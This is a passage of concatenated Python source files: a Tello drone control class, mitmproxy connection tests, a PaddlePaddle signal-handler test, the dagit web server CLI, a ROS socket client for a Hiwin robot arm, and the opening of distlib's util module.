Wi-Fi with SSID password Return: bool: True for successful, False for unsuccessful """ response = None for i in range(0, self.retry_count): response = self.send_command_with_return(command, timeout=timeout) if response == 'OK' or response == 'ok': return True return self.raise_result_error(command, response) def send_read_command(self, command: str, printinfo: bool = True) -> str: """Send set command to Tello and wait for its response. Possible set commands: - speed?: get current speed (cm/s): x: 1-100 - battery?: get current battery percentage: x: 0-100 - time?: get current fly time (s): time - height?: get height (cm): x: 0-3000 - temp?: get temperature (°C): x: 0-90 - attitude?: get IMU attitude data: pitch roll yaw - baro?: get barometer value (m): x - tof?: get distance value from TOF (cm): x: 30-1000 - wifi?: get Wi-Fi SNR: snr Return: bool: The requested value for successful, False for unsuccessful """ response = self.send_command_with_return(command, printinfo=printinfo) try: response = str(response) except TypeError as e: self.LOGGER.error(e) pass if ('error' not in response) and ('ERROR' not in response) and ('False' not in response): if response.isdigit(): return int(response) else: try: # isdigit() is False when the number is a float(barometer) return float(response) except ValueError: return response else: return self.raise_result_error(command, response) def raise_result_error(self, command: str, response: any) -> bool: raise Exception('Command ' + command + ' was unsuccessful. Message: ' + str(response)) def connect(self): """Entry SDK mode Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("command") def takeoff(self): """Tello auto takeoff Returns: bool: True for successful, False for unsuccessful False: Unsuccessful """ # Something it takes a looooot of time to take off and return a succesful take off. So we better wait. If not, is going to give us error on the following calls. if self.send_control_command("takeoff", timeout=20): self.is_flying = True return True else: return False def land(self): """Tello auto land Returns: bool: True for successful, False for unsuccessful """ if self.send_control_command("land"): self.is_flying = False return True else: return False def streamon(self): """Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That can be done through the Tello app. Returns: bool: True for successful, False for unsuccessful """ result = self.send_control_command("streamon") if result is True: self.stream_on = True return result def streamoff(self): """Set video stream off Returns: bool: True for successful, False for unsuccessful """ result = self.send_control_command("streamoff") if result is True: self.stream_on = False return result def emergency(self): """Stop all motors immediately Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("emergency") def move(self, direction: str, x: int): """Tello fly up, down, left, right, forward or back with distance x cm. Arguments: direction: up, down, left, right, forward or back x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command(direction + ' ' + str(x)) def move_up(self, x: int): """Tello fly up with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("up", x) def move_down(self, x: int): """Tello fly down with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("down", x) def move_left(self, x: int): """Tello fly left with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("left", x) def move_right(self, x: int): """Tello fly right with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("right", x) def move_forward(self, x: int): """Tello fly forward with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("forward", x) def move_back(self, x: int): """Tello fly back with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("back", x) def rotate_clockwise(self, x: int): """Tello rotate x degree clockwise. Arguments: x: 1-360 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("cw " + str(x)) def rotate_counter_clockwise(self, x: int): """Tello rotate x degree counter-clockwise. Arguments: x: 1-360 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("ccw " + str(x)) def flip(self, direction: str): """Tello fly flip. Arguments: direction: l (left), r (right), f (forward) or b (back) Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("flip " + direction) def flip_left(self): """Tello fly flip left. Returns: bool: True for successful, False for unsuccessful """ return self.flip("l") def flip_right(self): """Tello fly flip left. Returns: bool: True for successful, False for unsuccessful """ return self.flip("r") def flip_forward(self): """Tello fly flip left. Returns: bool: True for successful, False for unsuccessful """ return self.flip("f") def flip_back(self): """Tello fly flip left. Returns: bool: True for successful, False for unsuccessful """ return self.flip("b") def go_xyz_speed(self, x: int, y: int, z: int, speed: int): """Tello fly to x y z in speed (cm/s) Arguments: x: 20-500 y: 20-500 z: 20-500 speed: 10-100 Returns: bool: True for successful, False for unsuccessful """ return self.send_command_without_return('go %s %s %s %s' % (x, y, z, speed)) def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int): """Tello fly a curve defined by the current and two given coordinates with speed (cm/s). - If the arc radius is not within the range of 0.5-10 meters, it responses false. - x/y/z can’t be between -20 – 20 at the same time. Arguments: x1: 20-500 x2: 20-500 y1: 20-500 y2: 20-500 z1: 20-500 z2: 20-500 speed: 10-60 Returns: bool: True for successful, False for unsuccessful """ return self.send_command_without_return('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed)) def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int): """Tello fly to x y z in speed (cm/s) relative to mission pad iwth id mid Arguments: x: -500-500 y: -500-500 z: -500-500 speed: 10-100 mid: 1-8 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('go %s %s %s %s m%s' % (x, y, z, speed, mid)) def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int): """Tello fly to x2 y2 z2 over x1 y1 z1 in speed (cm/s) relative to mission pad with id mid Arguments: x1: -500-500 y1: -500-500 z1: -500-500 x2: -500-500 y2: -500-500 z2: -500-500 speed: 10-60 mid: 1-8 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('curve %s %s %s %s %s %s %s m%s' % (x1, y1, z1, x2, y2, z2, speed, mid)) def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int): """Tello fly to x y z in speed (cm/s) relative to mid1 Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation Arguments: x: -500-500 y: -500-500 z: -500-500 speed: 10-100 yaw: -360-360 mid1: 1-8 mid2: 1-8 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2)) def enable_mission_pads(self): return self.send_control_command("mon") def disable_mission_pads(self): return self.send_control_command("moff") def set_mission_pad_detection_direction(self, x): return self.send_control_command("mdirection " + str(x)) def set_speed(self, x: int): """Set speed to x cm/s. Arguments: x: 10-100 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("speed " + str(x)) last_rc_control_sent = 0 def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int, yaw_velocity: int): """Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds. Arguments: left_right_velocity: -100~100 (left/right) forward_backward_velocity: -100~100 (forward/backward) up_down_velocity: -100~100 (up/down) yaw_velocity: -100~100 (yaw) Returns: bool: True for successful, False for unsuccessful """ if int(time.time() * 1000) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS: pass else: self.last_rc_control_sent = int(time.time() * 1000) return self.send_command_without_return('rc %s %s %s %s' % (self.round_to_100(left_right_velocity), self.round_to_100( forward_backward_velocity), self.round_to_100( up_down_velocity), self.round_to_100(yaw_velocity))) def round_to_100(self, x: int): if x > 100: return 100 elif x < -100: return -100 else: return x def set_wifi_credentials(self, ssid, password): """Set the Wi-Fi SSID and password. The Tello will reboot afterwords. Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('wifi %s %s' % (ssid, password)) def connect_to_wifi(self, ssid, password): """Connects to the Wi-Fi with SSID and password. After this command the tello will reboot Only works on Tello EDU Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('ap %s %s' % (ssid, password)) def get_speed(self) -> int: """Query speed setting (cm/s) Returns: False: Unsuccessful int: 1-100 """ return self.send_read_command('speed?') def query_battery(self) -> int: """Get current battery percentage via a query command. Using get_battery is usually faster Returns: False: Unsuccessful int: 0-100 """ return self.send_read_command('battery?') def get_flight_time(self) -> int: """Query current fly time (s) Returns: False: Unsuccessful int: Seconds elapsed during flight. """ return self.send_read_command('time?') def query_height(self) -> int: """Get height in cm via a query command Using get_height is usually faster Returns: False: Unsuccessful int: 0-3000 """ return self.send_read_command('height?') def get_temperature(self) -> int: """Query temperature (°C) Returns: False: Unsuccessful int: 0-90 """ return self.send_read_command('temp?') def get_attitude(self) -> dict: """Query IMU attitude data Returns: False: Unsuccessful {'pitch': int, 'roll': int, 'yaw': int} """ r = self.send_read_command('attitude?').replace(';', ':').split(':') # {'pitch': xxx, 'roll': xxx, 'yaw': xxx} return dict(zip(r[::2], [int(i) for i in r[1::2]])) def get_barometer(self) -> int: """Get barometer value (m) Returns: False: Unsuccessful int: 0-100 """ return self.send_read_command('baro?') def get_distance_tof(self) -> int: """Get distance value from TOF (cm) Returns: False: Unsuccessful int: 30-1000 """ return self.send_read_command('tof?') def get_wifi(self) -> str: """Get Wi-Fi SNR Returns: False: Unsuccessful str: snr """ return self.send_read_command('wifi?') def get_sdk_version(self) -> str: """Get SDK Version Returns: False: Unsuccessful str: SDK Version """ return self.send_read_command('sdk?') def get_serial_number(self) -> str: """Get Serial Number Returns: False: Unsuccessful str: Serial Number """ return self.send_read_command('sn?') def end(self): """Call this method when you want to end the tello object""" if self.is_flying: self.land() if self.stream_on: self.streamoff() if self.background_frame_read is not None: self.background_frame_read.stop() if self.cap is not None: self.cap.release() host = self.address[0] del drones[host] def __del__(self): self.end() class BackgroundFrameRead: """ This class read frames from a VideoCapture in background. Then, just call backgroundFrameRead.frame to get the actual one. """ def __init__(self, tello, address): tello.cap = cv2.VideoCapture(address) self.cap = tello.cap if not self.cap.isOpened(): self.cap.open(address) self.grabbed, self.frame = self.cap.read() self.stopped = False def start(self): Thread(target=self.update_frame, args=()).start() return self def update_frame(self): while not self.stopped: if not self.grabbed or not self.cap.isOpened(): self.stop() else: (self.grabbed, self.frame) = self.cap.read() def stop(self): self.stopped = True
test_connections.py
import socket import os import threading import ssl import OpenSSL import pytest from unittest import mock from mitmproxy import connections from mitmproxy import exceptions from mitmproxy.net import tcp from mitmproxy.net.http import http1 from mitmproxy.test import tflow from mitmproxy.test import tutils from .net import tservers from pathod import test class TestClientConnection: def test_send(self): c = tflow.tclient_conn() c.send(b'foobar') c.send([b'foo', b'bar']) with pytest.raises(TypeError): c.send('string') with pytest.raises(TypeError): c.send(['string', 'not']) assert c.wfile.getvalue() == b'foobarfoobar' def test_repr(self): c = tflow.tclient_conn() assert 'address:22' in repr(c) assert 'ALPN' in repr(c) assert 'TLS' not in repr(c) c.alpn_proto_negotiated = None c.tls_established = True assert 'ALPN' not in repr(c) assert 'TLS' in repr(c) def test_tls_established_property(self): c = tflow.tclient_conn() c.tls_established = True assert c.ssl_established assert c.tls_established c.tls_established = False assert not c.ssl_established assert not c.tls_established def test_make_dummy(self): c = connections.ClientConnection.make_dummy(('foobar', 1234)) assert c.address == ('foobar', 1234) def test_state(self): c = tflow.tclient_conn() assert connections.ClientConnection.from_state(c.get_state()).get_state() == \ c.get_state() c2 = tflow.tclient_conn() c2.address = (c2.address[0], 4242) assert not c == c2 c2.timestamp_start = 42 c.set_state(c2.get_state()) assert c.timestamp_start == 42 c3 = c.copy() assert c3.get_state() != c.get_state() c.id = c3.id = "foo" assert c3.get_state() == c.get_state() def test_eq(self): c = tflow.tclient_conn() c2 = c.copy() assert c == c assert c != c2 assert c != 42 assert hash(c) != hash(c2) class TestServerConnection: def test_send(self): c = tflow.tserver_conn() c.send(b'foobar') c.send([b'foo', b'bar']) with pytest.raises(TypeError): c.send('string') with pytest.raises(TypeError): c.send(['string', 'not']) assert c.wfile.getvalue() == b'foobarfoobar' def test_repr(self): c = tflow.tserver_conn() c.sni = 'foobar' c.tls_established = True c.alpn_proto_negotiated = b'h2' assert 'address:22' in repr(c) assert 'ALPN' in repr(c) assert 'TLSv1.2: foobar' in repr(c) c.sni = None c.tls_established = True c.alpn_proto_negotiated = None assert 'ALPN' not in repr(c) assert 'TLS' in repr(c) c.sni = None c.tls_established = False assert 'TLS' not in repr(c) def test_tls_established_property(self): c = tflow.tserver_conn() c.tls_established = True assert c.ssl_established assert c.tls_established c.tls_established = False assert not c.ssl_established assert not c.tls_established def test_make_dummy(self): c = connections.ServerConnection.make_dummy(('foobar', 1234)) assert c.address == ('foobar', 1234) def test_simple(self): d = test.Daemon() c = connections.ServerConnection((d.IFACE, d.port)) c.connect() f = tflow.tflow() f.server_conn = c f.request.path = "/p/200:da" # use this protocol just to assemble - not for actual sending c.wfile.write(http1.assemble_request(f.request)) c.wfile.flush() assert http1.read_response(c.rfile, f.request, 1000) assert d.last_log() c.finish() d.shutdown() def test_terminate_error(self): d = test.Daemon() c = connections.ServerConnection((d.IFACE, d.port)) c.connect() c.connection = mock.Mock() c.connection.recv = mock.Mock(return_value=False) c.connection.flush = mock.Mock(side_effect=exceptions.TcpDisconnect) c.finish() d.shutdown() def test_sni(self): c = connections.ServerConnection(('', 1234)) with pytest.raises(ValueError, matches='sni must be str, not '): c.establish_ssl(None, b'foobar') def test_state(self): c = tflow.tserver_conn() c2 = c.copy() assert c2.get_state() != c.get_state() c.id = c2.id = "foo" assert c2.get_state() == c.get_state() def test_eq(self): c = tflow.tserver_conn() c2 = c.copy() assert c == c assert c != c2 assert c != 42 assert hash(c) != hash(c2) class TestClientConnectionTLS: @pytest.mark.parametrize("sni", [ None, "example.com" ]) def test_tls_with_sni(self, sni): address = ('127.0.0.1', 0) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(address) sock.listen() address = sock.getsockname() def client_run(): ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE s = socket.create_connection(address) s = ctx.wrap_socket(s, server_hostname=sni) s.send(b'foobar') s.shutdown(socket.SHUT_RDWR) threading.Thread(target=client_run).start() connection, client_address = sock.accept() c = connections.ClientConnection(connection, client_address, None) cert = tutils.test_data.path("mitmproxy/net/data/server.crt") key = OpenSSL.crypto.load_privatekey( OpenSSL.crypto.FILETYPE_PEM, open(tutils.test_data.path("mitmproxy/net/data/server.key"), "rb").read()) c.convert_to_ssl(cert, key) assert c.connected() assert c.sni == sni assert c.tls_established assert c.rfile.read(6) == b'foobar' c.finish() class TestServerConnectionTLS(tservers.ServerTestBase): ssl = True class handler(tcp.BaseHandler): def handle(self): self.finish() @pytest.mark.parametrize("clientcert", [ None, tutils.test_data.path("mitmproxy/data/clientcert"), os.path.join(tutils.test_data.path("mitmproxy/data/clientcert"), "client.pem"), ]) def test_tls(self, clientcert): c = connections.ServerConnection(("127.0.0.1", self.port)) c.connect() c.establish_ssl(clientcert, "foo.com") assert c.connected() assert c.sni == "foo.com" assert c.tls_established c.close() c.finish()
test_imperative_signal_handler.py
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys import signal import unittest import multiprocessing import time import paddle.compat as cpt from paddle.fluid import core def set_child_signal_handler(self, child_pid): core._set_process_pids(id(self), tuple([child_pid])) current_handler = signal.getsignal(signal.SIGCHLD) if not callable(current_handler): current_handler = None def __handler__(signum, frame): core._throw_error_if_process_failed() if current_handler is not None: current_handler(signum, frame) signal.signal(signal.SIGCHLD, __handler__) class TestDygraphDataLoaderSingalHandler(unittest.TestCase): def test_child_process_exit_with_error(self): def __test_process__(): core._set_process_signal_handler() sys.exit(1) exception = None try: test_process = multiprocessing.Process(target=__test_process__) test_process.start() set_child_signal_handler(id(self), test_process.pid) time.sleep(3) except core.EnforceNotMet as ex: self.assertIn("FatalError", cpt.get_exception_message(ex)) exception = ex self.assertIsNotNone(exception) def test_child_process_killed_by_sigsegv(self): def __test_process__(): core._set_process_signal_handler() os.kill(os.getpid(), signal.SIGSEGV) exception = None try: test_process = multiprocessing.Process(target=__test_process__) test_process.start() set_child_signal_handler(id(self), test_process.pid) time.sleep(3) except core.EnforceNotMet as ex: self.assertIn("Segmentation fault", cpt.get_exception_message(ex)) exception = ex self.assertIsNotNone(exception) def test_child_process_killed_by_sigbus(self): def __test_process__(): core._set_process_signal_handler() os.kill(os.getpid(), signal.SIGBUS) exception = None try: test_process = multiprocessing.Process(target=__test_process__) test_process.start() set_child_signal_handler(id(self), test_process.pid) time.sleep(3) except core.EnforceNotMet as ex: self.assertIn("Bus error", cpt.get_exception_message(ex)) exception = ex self.assertIsNotNone(exception) def test_child_process_killed_by_sigterm(self): def __test_process__(): core._set_process_signal_handler() time.sleep(10) test_process = multiprocessing.Process(target=__test_process__) test_process.daemon = True test_process.start() set_child_signal_handler(id(self), test_process.pid) time.sleep(1) if __name__ == '__main__': unittest.main()
cli.py
import os import sys import threading from contextlib import contextmanager import click import six from gevent import pywsgi from geventwebsocket.handler import WebSocketHandler from dagster import check, seven from dagster.cli.workspace import Workspace, get_workspace_from_kwargs, workspace_target_argument from dagster.core.instance import DagsterInstance from dagster.core.telemetry import START_DAGIT_WEBSERVER, log_action, log_repo_stats, upload_logs from dagster.utils import DEFAULT_WORKSPACE_YAML_FILENAME from .app import create_app_from_workspace from .version import __version__ def create_dagit_cli(): return ui # pylint: disable=no-value-for-parameter REPO_TARGET_WARNING = 'Can only use ONE of --workspace/-w, --python-file/-f, --module-name/-m.' DEFAULT_DAGIT_HOST = '127.0.0.1' DEFAULT_DAGIT_PORT = 3000 @click.command( name='ui', help=( 'Run dagit. Loads a repository or pipeline.\n\n{warning}'.format( warning=REPO_TARGET_WARNING ) + ( '\n\n Examples:' '\n\n1. dagit (works if .{default_filename} exists)' '\n\n2. dagit -w path/to/{default_filename}' '\n\n3. dagit -f path/to/file.py' '\n\n4. dagit -m some_module' '\n\n5. dagit -f path/to/file.py -a define_repo' '\n\n6. dagit -m some_module -a define_repo' '\n\n7. dagit -p 3333' '\n\nOptions Can also provide arguments via environment variables prefixed with DAGIT_' '\n\n DAGIT_PORT=3333 dagit' ).format(default_filename=DEFAULT_WORKSPACE_YAML_FILENAME) ), ) @workspace_target_argument @click.option( '--host', '-h', type=click.STRING, default=DEFAULT_DAGIT_HOST, help="Host to run server on, default is {default_host}".format(default_host=DEFAULT_DAGIT_HOST), ) @click.option( '--port', '-p', type=click.INT, help="Port to run server on, default is {default_port}".format(default_port=DEFAULT_DAGIT_PORT), ) @click.option( '--path-prefix', '-l', type=click.STRING, default='', help="The path prefix where Dagit will be hosted (eg: /dagit), default is ''", ) @click.option( '--storage-fallback', help="Base directory for dagster storage if $DAGSTER_HOME is not set", default=None, type=click.Path(), ) @click.version_option(version=__version__, prog_name='dagit') def ui(host, port, path_prefix, storage_fallback, **kwargs): # add the path for the cwd so imports in dynamically loaded code work correctly sys.path.append(os.getcwd()) if port is None: port_lookup = True port = DEFAULT_DAGIT_PORT else: port_lookup = False if storage_fallback is None: with seven.TemporaryDirectory() as storage_fallback: host_dagit_ui(host, port, path_prefix, storage_fallback, port_lookup, **kwargs) else: host_dagit_ui(host, port, path_prefix, storage_fallback, port_lookup, **kwargs) def host_dagit_ui(host, port, path_prefix, storage_fallback, port_lookup=True, **kwargs): instance = DagsterInstance.get(storage_fallback) workspace = get_workspace_from_kwargs(kwargs, instance) if not workspace: raise Exception('Unable to load workspace with cli_args: {}'.format(kwargs)) return host_dagit_ui_with_workspace(instance, workspace, host, port, path_prefix, port_lookup) def host_dagit_ui_with_workspace(instance, workspace, host, port, path_prefix, port_lookup=True): check.inst_param(instance, 'instance', DagsterInstance) check.inst_param(workspace, 'workspace', Workspace) if len(workspace.repository_location_handles) == 1: repository_location_handle = workspace.repository_location_handles[0] # Telemetry logic needs to be updated to support multi-repo / gRPC repo locations # See https://github.com/dagster-io/dagster/issues/2752 if ( hasattr(repository_location_handle, 'repository_code_pointer_dict') and len(repository_location_handle.repository_code_pointer_dict) == 1 ): pointer = next(iter(repository_location_handle.repository_code_pointer_dict.values())) from dagster.core.definitions.reconstructable import ReconstructableRepository recon_repo = ReconstructableRepository(pointer) log_repo_stats(instance=instance, repo=recon_repo, source='dagit') app = create_app_from_workspace(workspace, instance, path_prefix) start_server(instance, host, port, path_prefix, app, port_lookup) @contextmanager def uploading_logging_thread(): stop_event = threading.Event() logging_thread = threading.Thread(target=upload_logs, args=([stop_event])) try: logging_thread.start() yield finally: stop_event.set() logging_thread.join() def start_server(instance, host, port, path_prefix, app, port_lookup, port_lookup_attempts=0): server = pywsgi.WSGIServer((host, port), app, handler_class=WebSocketHandler) print( # pylint: disable=print-call 'Serving on http://{host}:{port}{path_prefix} in process {pid}'.format( host=host, port=port, path_prefix=path_prefix, pid=os.getpid() ) ) log_action(instance, START_DAGIT_WEBSERVER) with uploading_logging_thread(): try: server.serve_forever() except OSError as os_error: if 'Address already in use' in str(os_error): if port_lookup and ( port_lookup_attempts > 0 or click.confirm( ( 'Another process on your machine is already listening on port {port}. ' 'Would you like to run the app at another port instead?' ).format(port=port) ) ): port_lookup_attempts += 1 start_server( instance, host, port + port_lookup_attempts, path_prefix, app, True, port_lookup_attempts, ) else: six.raise_from( Exception( ( 'Another process on your machine is already listening on port {port}. ' 'It is possible that you have another instance of dagit ' 'running somewhere using the same port. Or it could be another ' 'random process. Either kill that process or use the -p option to ' 'select another port.' ).format(port=port) ), os_error, ) else: raise os_error cli = create_dagit_cli() def main(): # click magic cli(auto_envvar_prefix='DAGIT') # pylint:disable=E1120
Hiwin_RT605_ArmCommand_Socket_20190627184149.py
#!/usr/bin/env python3 # license removed for brevity import rospy import os import socket ##多執行序 import threading import time import sys import matplotlib as plot import HiwinRA605_socket_TCPcmd as TCP import HiwinRA605_socket_Taskcmd as Taskcmd import numpy as np from std_msgs.msg import String from ROS_Socket.srv import * from ROS_Socket.msg import * from std_msgs.msg import Int32MultiArray import math import enum Socket = 0 data = '0' #設定傳輸資料初始值 Arm_feedback = 1 #假設手臂忙碌 NAME = 'socket_server' arm_mode_flag = False ##------------class pos------- class point(): def __init__(self, x, y, z, pitch, roll, yaw): self.x = x self.y = y self.z = z self.pitch = pitch self.roll = roll self.yaw = yaw pos = point(0.0,36.8,11.35,-90.0,0.0,0.0) ##------------class socket_cmd--------- class socket_data(): def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode): self.grip = grip self.setvel = setvel self.ra = ra self.delay = delay self.setboth = setboth self.action = action self.Speedmode = Speedmode socket_cmd = socket_data(0,0.0,0,0,0,0,0) ##-----------switch define------------## class switch(object): def __init__(self, value): self.value = value self.fall = False def __iter__(self): """Return the match method once, then stop""" yield self.match raise StopIteration def match(self, *args): """Indicate whether or not to enter a case suite""" if self.fall or not args: return True elif self.value in args: # changed for v1.5, see below self.fall = True return True else: return False ##-----------client feedback arm state---------- class StateFeedback(): def __init__(self,ArmState,SentFlag): self.ArmState = ArmState self.SentFlag = SentFlag state_feedback = StateFeedback(0,0) def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料 pos.x = x pos.y = y pos.z = z pos.pitch = pitch pos.roll = roll pos.yaw = yaw ##----------Arm Mode-------------### def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料 global arm_mode_flag socket_cmd.action = action socket_cmd.grip = grip socket_cmd.ra = ra socket_cmd.setvel = setvel socket_cmd.setboth = setboth arm_mode_flag = True Socket_command() ##-------Arm Speed Mode------------### def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料 global speed_mode_flag socket_cmd.Speedmode = speedmode def socket_talker(): ##創建Server node pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10) rospy.init_node(NAME) rate = rospy.Rate(10) # 10hz print ("Ready to connect") while not rospy.is_shutdown(): # hello_str = "hello world %s" % rospy.get_time() state = Int32MultiArray() state.data = [state_feedback.ArmState,state_feedback.SentFlag] # rospy.loginfo(state) pub.publish(state) rate.sleep() ##----------socket 封包傳輸--------------## ##---------------socket 傳輸手臂命令----------------- def Socket_command(): global Socket,arm_mode_flag,data if arm_mode_flag == True: arm_mode_flag = False for case in switch(socket_cmd.action): #-------PtP Mode-------- if case(Taskcmd.Action_Type.PtoP): for case in switch(socket_cmd.setboth): if case(Taskcmd.Ctrl_Mode.CTRL_POS): data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel) break if case(Taskcmd.Ctrl_Mode.CTRL_EULER): data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel) break if case(Taskcmd.Ctrl_Mode.CTRL_BOTH): data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel) break break #-------Line Mode-------- if case(Taskcmd.Action_Type.Line): for case in switch(socket_cmd.setboth): if case(Taskcmd.Ctrl_Mode.CTRL_POS): data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel) break if case(Taskcmd.Ctrl_Mode.CTRL_EULER): data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel ) break if case(Taskcmd.Ctrl_Mode.CTRL_BOTH): data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel ) break break #-------設定手臂速度-------- if case(Taskcmd.Action_Type.SetVel): data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel) break #-------設定手臂Delay時間-------- if case(Taskcmd.Action_Type.Delay): data = TCP.SetDelay(socket_cmd.grip,0) break #-------設定手臂急速&安全模式-------- if case(Taskcmd.Action_Type.Mode): data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode) break socket_cmd.action= 6 ##切換初始mode狀態 print(data) print("Socket:", Socket) Socket.send(data.encode('utf-8'))#socket傳送for python to translate str ##-----------socket client-------- def socket_client(): global Socket try: Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin #s.connect(('192.168.1.102', 8080))#iclab computerx print('Connection has been successful') except socket.error as msg: print(msg) sys.exit(1) #print('Connection has been successful') print(Socket.recv(1024)) while 1: feedback_str = Socket.recv(1024) #手臂端傳送手臂狀態 if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令 state_feedback.ArmState = 0 if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令 state_feedback.ArmState = 1 if str(feedback_str[2]) == '54':# 6 策略完成 state_feedback.ArmState = 6 print("shutdown") #確認傳送旗標 if str(feedback_str[4]) == '48':#回傳0 false state_feedback.SentFlag = 0 if str(feedback_str[4]) == '49':#回傳1 true state_feedback.SentFlag = 1 ##---------------socket 傳輸手臂命令 end----------------- if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown: break rospy.on_shutdown(myhook) Socket.close() ##-----------socket client end-------- ##-------------socket 封包傳輸 end--------------## def myhook(): print ("shutdown time!") if __name__ == '__main__': socket_cmd.action = 6##切換初始mode狀態 ## 多執行緒 t = threading.Thread(target=socket_client) t.start() # 開啟多執行緒 #time.sleep(1) try: socket_talker() except rospy.ROSInterruptException: pass t.join() ## 多執行序 end
util.py
# # Copyright (C) 2012-2013 The Python Software Foundation. # See LICENSE.txt and CONTRIBUTORS.txt. # import codecs from collections import deque import contextlib import csv from glob import iglob as std_iglob import io import json import logging import os import py_compile import re import shutil import socket import ssl import subprocess import sys import tarfile import tempfile try: import threading except ImportError: import dummy_threading as threading import time from . import DistlibException from .compat import (string_types, text_type, shutil, raw_input, StringIO, cache_from_source, urlopen, httplib, xmlrpclib, splittype, HTTPHandler, HTTPSHandler as BaseHTTPSHandler, BaseConfigurator, valid_ident, Container, configparser, URLError, match_hostname, CertificateError, ZipFile) logger = logging.getLogger(__name__) # # Requirement parsing code for name + optional constraints + optional extras # # e.g. 'foo >= 1.2, < 2.0 [bar, baz]' # # The regex can seem a bit hairy, so we build it up out of smaller pieces # which are manageable. # COMMA = r'\s*,\s*' COMMA_RE = re.compile(COMMA) IDENT = r'(\w|[.-])+' EXTRA_IDENT = r'(\*|:(\*|\w+):|' + IDENT + ')' VERSPEC = IDENT + r'\*?' RELOP = '([<>=!~]=)|[<>]' # # The first relop is optional - if absent, will be taken as '~=' # BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + VERSPEC + ')(' + COMMA + '(' + RELOP + r')\s*(' + VERSPEC + '))*') DIRECT_REF = '(from\s+(?P<diref>.*))' # # Either the bare constraints or the bare constraints in parentheses # CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + '|' + DIRECT_REF + r')\s*\)|(?P<c2>' + BARE_CONSTRAINTS + '\s*)') EXTRA_LIST = EXTRA_IDENT + '(' + COMMA + EXTRA_IDENT + ')*' EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]' REQUIREMENT = 